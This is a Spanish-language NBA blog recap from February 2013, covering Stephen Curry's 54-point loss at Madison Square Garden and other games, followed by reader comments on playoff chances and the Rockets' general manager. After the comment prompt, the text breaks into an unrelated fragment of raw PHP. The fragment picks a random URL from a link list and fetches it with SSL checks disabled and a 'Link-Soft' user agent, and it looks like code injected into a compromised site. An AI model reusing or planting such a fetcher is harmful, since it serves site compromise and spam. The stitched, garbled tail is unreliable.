La Crónica: Mayor esfuerzo en vano

28 de February de 2013 por Simon

Impresionante jornada en la NBA que como siempre nos dejó imágenes e hitos espectaculares y, sobre todo,  muchas cosas que destacar.

El partido de la jornada era sin duda la visita de Golden State Warriors al Madison Square Garden. Dos de los equipos más sorprendentes y entretenidos de la liga se enfrentaban en un partido que no decepcionó a pesar de que las expectativas del mismo ya eran altas. La victoria fue para los New York Knicks por 105-109 pero el verdadero protagonista del encuentro fue Stephen Curry que anotó ni más ni menos que ¡¡¡¡¡54 puntos!!!!! con 11 triples anotados de 13 intentos. Se quedó a tan sólo un triple del récord absoluto de triples en un partido en la historia de la NBA que comparten Kobe Bryant y Donyell Marshall. Sin embargo, el enorme partido de Curry no sirvió para que su equipo se llevara la victoria principalmente porque los Knicks hicieron valer todos sus puntos fuertes y mostraron la cara buena de su juego. Anthony anotó y repartió juego con mucha fluidez y JR Smith fue un ciclón desde la banca, pero lo que más diferencias marcó ayer fue la diferencia en los tableros. Sin David Lee ni Andrew Bogut en los Warriors, Tyson Chandler hizo su particular fiesta en la zona anoche y capturó ni más ni menos que 28 rebotes a los que añadió 16 puntos. Gran victoria de los Knicks que tendrán que mantener este nivel de cara al final de temporada si quieren hacerse con el segundo puesto de la conferencia Este.

En la batalla por liderar la liga y/o la conferencia Oeste vimos como la lucha se aprieta aún más con la derrota de San Antonio Spurs a manos de Phoenix Suns tras un increíble final de partido con prórroga incluida. El partido estuvo controlado por los de Popovich durante los primeros 45 minutos. De hecho a falta de 3 minutos San Antonio estaba 7 puntos arriba y daba toda la sensación de tener el partido en el bolsillo pero un gran último minuto de Phoenix los dejó tan sólo dos abajo a falta de 5 segundos.  Tras cometer falta personal rápida, Ginobili anotó el primer libre pero falló el segundo. Tras coger el rebote O´Neal hizo un pase a la desesperada hacia Wes Johnson que anotó un impresionante triple para mandar el partido a la prórroga. En la prórroga los Spurs directamente desaparecieron y tan sólo fueron capaces de anotar un tiro libre de Parker (105-101). Tim Duncan alcanzó en este partido la cifra de 13.000 rebotes en su carrera. Sorprendente derrota de San Antonio que acerca a la pelea por el liderato a Oklahoma City Thunder que arrasó a New Orleans Hornets en casa y terminó el partido con +45 a su favor (74-119). El mejor Thunder fue Kevin Durant que firmó su segundo triple-doble tras el All-Star con 18 puntos, 11 rebotes y 10 asistencias en apenas 27 minutos. 

Memphis logró su octava victoria consecutiva ante Dallas Mavericks. La victoria se forjó sobretodo en el tercer cuarto en el que Memphis dejó en tan sólo 5 puntos a los Mavs.  Hasta ese momento el partido estaba siendo controlado por los Mavericks gracias a un impresionante primer cuarto en el que lograron casi 40 puntos.  Zach Randolph y Marc Gasol volvieron a ser los mejores de Memphis y se combinaron para 43 puntos, 22 rebotes y 9 asistencias (84-90). Denver Nuggets, el más inmediato perseguidor de Memphis Grizzlies, consiguió  anoche una importante y trabajada victoria en el Rose Garden ante los Trail Blazers que parecen haber perdido comba de manera definitiva en la pelea por los Play Off. Denver consiguió que el partido se jugara al ritmo que ellos querían marcar y eso fue definitivo para Portland. En los últimos minutos y con el partido en el aire, una bonita jugada al poste del base Andre Miller puso por delante a Denver por 4 puntos. Un triple de Lillard puso uno abajo a Portland pero en la siguiente jugada Aldridge no fue capaz de anotar el lanzamiento para forzar la prórroga y Denver se llevó el gato al agua (111-109). El mejor del partido fue el base Ty Lawson con 30 puntos acompañado por los 29 de Iguodala a los que añadió 7 rebotes y 8 asistencias. Lillard volvió a demostrar que no tiene rival para el ROY pero sus 26 puntos no tuvieron recompensa.

Utah Jazz cayó por tercer partido consecutivo y lo hizo ante Atlanta Hawks en los que Al Horford sigue a un nivel All-Star. Anoche terminó con 34 puntos a los que añadió 15 rebotes para llevarse la victoria de Salt Lake City (102-91). Utah Jazz continúa complicándose su acceso a Play Off al igual que lo hicieron anoche Houston Rockets cayendo ante Milwaukee Bucks en Houston.  Monta Ellis tuvo anoche una de esas noche mágicas que tiene cada tanto y fue un ciclón imparable para los Rockets. El partido estuvo empatado hasta los últimos segundos y como no, en el último  Monta Ellis anotó un inverosímil triple, sin apoyos, sin realizar toda la mecánica, sin pararse en su carrera lateral y hasta el balón entro llorando pero entró y los Bucks se llevaron la victoria de Houston (110-107)

Raptors casi que se descartó anoche para los Play Off con una nueva derrota ante Cleveland que han logrado dos victorias seguidas sin Kyrie Irving gracias al gran nivel mostrado por el rookie Dion Waiters y la aportación del banquillo (92-103). Por su parte, Detroit consiguió  una ajustada victoria ante los Washington Wizards (96-95). En Detroit volvió a la acción Brandon Knight y lo hizo con su máximo de carrera con 32 puntos. Calderón logró 18 asistencias para la causa. Por último Sacramento venció con comodidad a Orlando Magic (125-101)  con 7 jugadores en dobles dígitos de anotación.

PREMIOS

MVP: Nivelazo el que está mostrando Al Horford desde el All Star. Anoche fueron 34 puntos y 15 rebotes. También podemos destacar los 28 rebotes de Tyson Chandler, los 29 puntos, 7 rebotes, 8 asistencias y 5 robos de Andre Iguodala o los 27 puntos, 6 rebotes, 13 asistencias y 6 robos de Monta Ellis, con buzzer-beater incluido.

Rookie: 26 puntos y 4 asistencias para Damian Lillard mientras que Dion Waiters se fue a los 23 puntos y 6 asistencias.

Sorpresa: Vuelve Brandon Knight de la lesión y se casca 32 puntos. Jermaine O’Neal sigue a un ritmo increíble y anoche consiguió otro doble-doble. Fueron 22 puntos y 13 rebotes.

Decepción: No parece que la salida de Redick le haya sentado muy bien a Nikola Vucevic. Lleva algo flojos los últimos partidos y el de ayer seguro que querrá olvidarlo cuanto antes. Anotó 4 puntos y capturó solo 2 rebotes.

Esfuerzo en vano: Perfectamente podríamos llamar este premio a partir de ahora “Stephen Curry” en honor al jugador de los Warriors. Anotar 54 puntos con un 11 de 13 en triples, capturar 6 rebotes, repartir 7 asistencias y no ganar… Eso tiene delito.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

18 comentarios a esta entrada

  1. Oli dice:
    #1

    Increible lo de Curry cada día me gustan más los warriors y el churro de triple de Monta les hace un gran favor a los lakers.

      Citar

  2. Alfredo dice:
    #2

    Por este tipo de derrotas, los Spurs no son tan candidatos como deberían y en esa posible serie con Lakers se ve una batalla dura a 6 o 7 partidos.

      Citar

  3. MagicJohnson32 dice:
    #3

    Alfredo:
    Por este tipo de derrotas, los Spurs no son tan candidatos como deberían y en esa posible serie con Lakers se ve una batalla dura a 6 o 7 partidos.

    Yo no creo que sea por eso, sino porque hace seis años de sus últimas finales y desde entonces siguen haciendo grandes regular season pero siempre caen en las eliminatorias del Oeste.

    Vaya triple más raro de Ellis. La verdad es que la jugada de Jennings es horrible y Monta ya hace bastante con tirar.

    Y gran jornada para los Lakers, sin jugar. Ahora falta que ganen a Wolves y Hawks, claro.

      Citar

  4. Ruxixón dice:
    #4

    Por estas cosas el Madison tiene tanta mística a su alrededor,por haber presenciado partidos excelsos de jugadores rivales,”afortunados desafortunados” seguidores de los Knicks,jaja.

    Buceando por la red los seguidores de los Suns están tirandose de los pelos por su equipo y es que ahora que deberían tanquear,para coger buenas opciones para elegir lo poco potable que hay en el draft,se dedican a ganar partidos que en la vida nadie apostaría por ellos.

    En la lucha por entrar en PO ojito a este partido que le puede dar la vida a Milwaukee de acabar ajustadas las cosas.Houston y Utah se ponen de acuerdo de nuevo pero a los Rockets los veo dentro salvo que fallen las fuerzas a última hora,dado que en comparación me parece que saben más a que juegan que los Jazz,donde por cierto Millsap y Al Jefferson han declarado querer seguir en sus filas.En mi opinión a lo sumo 1 seguirá el año próximo.El tiro de Monta Ellis espectacular,acorde con lo que ha sido la jornada y la crónica de Simon.

      Citar

  5. Ruxixón dice:
    #5

    Por cierto,se me olvidaba comentar el debut como titular de D-Mo en Houston.Me ha gustado mucho las prestaciones que ha dado y demuestra mucho entendimiento con Asik a la vista de como han jugado debajo de la canasta.Está en una oportunidad única para hacerse con ese puesto,al menos esta temporada,entre que aterriza en ese equipo Robinson.

      Citar

  6. Denise dice:
    #6

    Denise:
    Creo que Lakers solo pueden aspirar a la 8º plaza en detrimento de Utah.

    Analizando el calendario de ambos, mis cuentas son:

    – En lo que queda de febrero:
    Lakers : 4 victorias
    Utah: 3 victorias

    – Marzo:
    Lakers: 10 victorias
    Utah: 7 victorias

    – Abril:
    Lakers: 6 victorias
    Utah: 5 victorias

    Según mis cuentas (que no sirven para nada..xD) los Lakers entrarían en playoffs por una victoria.
    Lo que les queda de febrero hasta el partido del 5 de marzo contra Oklahoma es muy duro, si ahí consiguen un 50% de victorias, deben entrar porque luego les queda un mes de marzo muy pero que muy fácil.
    Después, el mes de abril vuelve a ser complicado pero la mayoría de partidos son en casa, y en vísperas de playoffs, lo mas normal es que los cracks de GSW, Spurs y Rockets (sus 3 ultimos rivales) ni jueguen o lo hagan con menos minutos e intensidad de lo normal.

    A Utah le queda un febrero con rivales menores pero fuera de casa y rivales muy duros en casa, bastante fuerte lo que les queda de mes.
    Después en Marzo vuelven a tener salidas muy dificiles, y lo que consigan en su cancha será esencial para su futuro. En abril, su calendario vuelve a ser favorable y lo que apriete el publico en su cancha va a ser vital

    Bueno..cito mi comentario del 9 de Febrero sobre las posibilidades de Lakers en Playoffs. Las victorias desde el 9 de febrero de Utah las he clavado (3), pero los Lakers ya tienen 4 victorias más el partido de esta noche en casa ante Minnessota. Estamos hablando de que en 20 días, Lakers podrían recuperar 2 juegos a Utah, lo que aumenta todavía mas sus posibilidades de Playoffs ya que tienen un calendario de Marzo absolutamente absequible, mientras que el de Utah es bastante complicado.

    Si no hay lesión de un pez gordo en Lakers, a finales de marzo deberían estar metidos ya en plazas de Playoffs.

      Citar

  7. Simon dice:
    #7

    Ostias Denise que control, caen esta noche los Lakers y clavas tus pronósticos para febrero… si lo haces, mañana hablaremos tu y yo por si digo de apostar algo que me aconsejes con tus habilidades de Nostradamus jajajajaj

      Citar

  8. Esteban dice:
    #8

    no hemos hablado aún del GM del año

    yo tengo mi candidato, como es su nombre? Daryl Morey?

    bueno nunca he visto un GM tan atrevido, tan audaz, tan desconcertante y a la vez, tan sorprendente a quien le sale todo bien, simplemente INCREIBLE

    desarmo un equipo que termino 34-32 por completo a cambio de… NADA practicamente, y lo transformo en algo sorprendente

    amnistio a un rendidor luis SCOLA, la amnistia mas injusta hasta el momento no? podemos coincidir que un ala pivote a razon de 10 millones al año, con promedio de 15.5 puntos y 6.5 rebotes, supercomprometido con la institucion no merecia que lo echen como a LEWIS o ARENAS

    no renovo a goran Dragic, despues de firmar su mejor temporada y terminar el año con promedios cercanos al 20-10, a cambio de nada…

    traspaso a lowry, con su bajo contrato, cuando se suponia que seria un futuro base all-star, a cambio de una ronda

    se deshizo de chase Budinger, de buena temporada, a cambio de nada

    No renovo a Lee quien habia hecho las cosas medianamente bien y que un “genio” como Ainge le dio un contrato largo por 5 millones

    de esta atipica manera, de un momento a otro, limpio todo su espacio salarial y acumulo rondas de Draft, no tan altas, los numeros 12, 16 y 18

    A esa altura, su objetivo parecia ser Howard, y cuando esto fracaso, TODOS EN UNANIMIDAD considerabamos a los Rockets como el peor equipo de la NBA

    De ultima intento un golpe de efecto con Lin al estilo YAO MING, lo que todos consideramos un error garrafal, esto sumado a lo que parecia un contrato absurdo para ASIK y mantener a un Kevin Martin que no parecia encajar en la reconstrucción

    pero nadie imagino la creatividad del GM,

    primero con un movimiento genial, martin y Lamb a cambio del tercer mejor escola de la liga, Harde, quien, cuando wade y Kobe sientan su edad y bajen sus prestaciones, sera sin dudas el mejor escolta de toda la competicion

    el tiempo le dio la razon con ASIK, hoy por 8 millones y 3 años de contrato aprece una ganga, viendo lo que cobra Hibbert, Nene, Okafor, Chandler y lo que pedira Pekovic, es un muy buen arreglo. Asik es mejor defensor y reboteador que la mayoria de los nombrados y cobra varios millones menos, siendo ademas un defensor de elite y un jugador a quien la falta de protagonismo ofensivo no le molesta

    la jugada de LIN no fue lo mala que se esperaba ni tampoco lo buena, pero a dirigido bien al equipo y ha tenido partidos grandiosos y siendo un base aceptable, ademas 8 millones no son una locura para un titular en esta liga

    a esto se le suma a Parsons, quien ha ganado la confianza del entrendor y del publico en general y parece tener futuro como alero titular por muchos años

    y gracias al espacio que tienen, logran hacerse con un numer 5 del draft como Thomas Robinson, un rookie que en principio deberia de responder bien

    si a el se le suman los otros dos rookies Montiejunas y Terrence Jones, hablamos de un equipo con juego interior para años

      Citar

  9. Viva_Dirk dice:
    #9

    A lo que dice Esteban hay que sumar que acaba de hacerse con Robinson, un jugador de un tremendo potencial que puede ser una pareja tremenda en cuanto a rebote con Asik. La verdad es que ha hecho grandes cosas el GM de los Rockets.

    De Curry que voy a decir, hace ya tiempo declaré mi amor por el, jeje. Si no tuviera esa facilidad para lesionarse seria un jugador mucho mas nombrado. El partido de ayer, mas allá de los números es para babear viendolo, que capacidad de liderazgo y montañas de clase.

      Citar

  10. Jose Luis dice:
    #10

    Bueno, creo que si se hubiera quedado con Budinger en lugar de Delfino estaría mejor, pero lo ha hecho bastante bien. Aunque cambiar a Dragic por Lin… tampoco lo veo muy positivo, la verdad. Lo demás muy bien, tanto Asik como el movimiento por Harden y el de Thomas Robinson.

      Citar

  11. R1Molano dice:
    #11

    Espectacular doble noche de Curry, la de ayer directamente idílica.

    El partido lo ganan Stern y Silver metiendole una sanción desmesurada (e injusta comparado a los 0$ que le caen a West o que a Hibbert le cae lo mismo) a David Lee. Sin el mejor reboteador de GSW, Chandler se va a 28 rebotes, 10 ofensivos, y Curry se queda demasiado solo en la ofensiva, justo cuando Lee es super efectivo aprovechando los espacios que genera Curry.

    Al menos hemos competido bien en los posiblemente dos partidos mas difíciles de lo que nos queda de calendario (hay uno en San Antonio, pero ese se va a competir a cara de perro por lo de la racha de derrotas allí), ahora, quedan dos en Boston y Philly, y la llegada de los últimos 22 partidos, con sólo 6 salidas del Oracle Arena.

      Citar

  12. Esteban dice:
    #12

    Jose Luis:
    Bueno, creo que si se hubiera quedado con Budinger en lugar de Delfino estaría mejor, pero lo ha hecho bastante bien. Aunque cambiar a Dragic por Lin… tampoco lo veo muy positivo, la verdad. Lo demás muy bien, tanto Asik como el movimiento por Harden y el de Thomas Robinson.

    si quiza no fue el mejor movimiento el de LIN, pero daba la impresion que seria uno de los peores de la liga, dado que nadie lo veia de jugador franquicia ni de tiotular confiable, y de cierta forma lo ha sido

    por otro lado, tampoco lin cobra tanto mas que dragic y no es tanto peor, es un lunar noi una marca grande

      Citar

  13. Jose Luis dice:
    #13

    Es bastante peor que Dragic a mi gusto, quizá lo compense con merchandising pero esto no da victorias ni anillos.

    Por otro lado, también es cierto que varios de estos movimientos vinieron de parte de los demás GM: Harden fue ofrecido seguro, al igual que los Kings ofrecieron a Thomas Robinson por Patterson. Pero vamos, buena labor ha hecho.

      Citar

  14. Lucho dice:
    #14

    comparto el comentario de esteban el n°8, totalmente de acuerdo

      Citar

  15. Esteban dice:
    #15

    Jose Luis:
    Es bastante peor que Dragic a mi gusto, quizá lo compense con merchandising pero esto no da victorias ni anillos.

    Por otro lado, también es cierto que varios de estos movimientos vinieron de parte de los demás GM: Harden fue ofrecido seguro, al igual que los Kings ofrecieron a Thomas Robinson por Patterson. Pero vamos, buena labor ha hecho.

    si es verdad que los ofrecieron, cosa que no consta, fue gracias a GM que sirvio la mesa y la puso en exhibicion para que los otro vengan a ofrecer, teniendo buenos jovenes y mucho espacio

      Citar

  16. Esteban dice:
    #16

    hoy pacers vs clippers

    prueba de caracter a domiciilio para los pacers, tercer partido para granger que deberia producir algo y duelo de tecnicos infravalorados

    q belleza de noche

      Citar

  17. safd dice:
    #17

    Esteban:
    no hemos hablado aún del GM del año

    yo tengo mi candidato, como es su nombre? Daryl Morey?

    bueno nunca he visto un GM tan atrevido, tan audaz, tan desconcertante y a la vez, tan sorprendente a quien le sale todo bien, simplemente INCREIBLE

    desarmo un equipo que termino 34-32 por completo a cambio de… NADA practicamente, y lo transformo en algo sorprendente

    amnistio a un rendidor luis SCOLA, la amnistia mas injusta hasta el momento no? podemos coincidir que un ala pivote a razon de 10 millones al año, con promedio de 15.5 puntos y 6.5 rebotes, supercomprometido con la institucion no merecia que lo echen como a LEWIS o ARENAS

    no renovo a goran Dragic, despues de firmar su mejor temporada y terminar el año con promedios cercanos al 20-10, a cambio de nada…

    traspaso a lowry, con su bajo contrato, cuando se suponia que seria un futuro base all-star, a cambio de una ronda

    se deshizo de chase Budinger, de buena temporada, a cambio de nada

    No renovo a Lee quien habia hecho las cosas medianamente bien y que un “genio” como Ainge le dio un contrato largo por 5 millones

    de esta atipica manera, de un momento a otro, limpio todo su espacio salarial y acumulo rondas de Draft, no tan altas, los numeros 12, 16 y 18

    A esa altura, su objetivo parecia ser Howard, y cuando esto fracaso, TODOS EN UNANIMIDAD considerabamos a los Rockets como el peor equipo de la NBA

    De ultima intento un golpe de efecto con Lin al estilo YAO MING, lo que todos consideramos un error garrafal, esto sumado a lo que parecia un contrato absurdo para ASIK y mantener a un Kevin Martin que no parecia encajar en la reconstrucción

    pero nadie imagino la creatividad del GM,

    primero con un movimiento genial, martin y Lamb a cambio del tercer mejor escola de la liga, Harde, quien, cuando wade y Kobe sientan su edad y bajen sus prestaciones, sera sin dudas el mejor escolta de toda la competicion

    el tiempo le dio la razon con ASIK, hoy por 8 millones y 3 años de contrato aprece una ganga, viendo lo que cobra Hibbert, Nene, Okafor, Chandler y lo que pedira Pekovic, es un muy buen arreglo. Asik es mejor defensor y reboteador que la mayoria de los nombrados y cobra varios millones menos, siendo ademas un defensor de elite y un jugador a quien la falta de protagonismo ofensivo no le molesta

    la jugada de LIN no fue lo mala que se esperaba ni tampoco lo buena, pero a dirigido bien al equipo y ha tenido partidos grandiosos y siendo un base aceptable, ademas 8 millones no son una locura para un titular en esta liga

    a esto se le suma a Parsons, quien ha ganado la confianza del entrendor y del publico en general y parece tener futuro como alero titular por muchos años

    y gracias al espacio que tienen, logran hacerse con un numer 5 del draft como Thomas Robinson, un rookie que en principio deberia de responder bien

    si a el se le suman los otros dos rookies Montiejunas y Terrence Jones, hablamos de un equipo con juego interior para años

    dios te oiga que le den el premio que en la porra de aqui lo puse como el GM del año jeje

      Citar

  18. Simon dice:
    #18

    Coincido con Esteban al 100×100. En cuanto a Lin, pues su contrato me parece ligeramente alto pero no desmesurado, un buen contrato para Lin estaría por los 6… asi que no es para tanto, solo son 2 millones más… y es un jugador que le falta regularidad pero este año ha hecho muy buenos partidos.
    El único lunar para Daryl Morey esta temporada es que no diera orden de dar un poco de bola a los Rookies, contar un poquito mas con Motiejunas y Jones no hubiera estado mal… y el lío con Royce White para mi no lo han sabido manejar tampoco. Pero vamos que tienen equipo para muchos años aqui y lo mejor, todavía le quedará bastante espacio para gastar si están dispuestos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>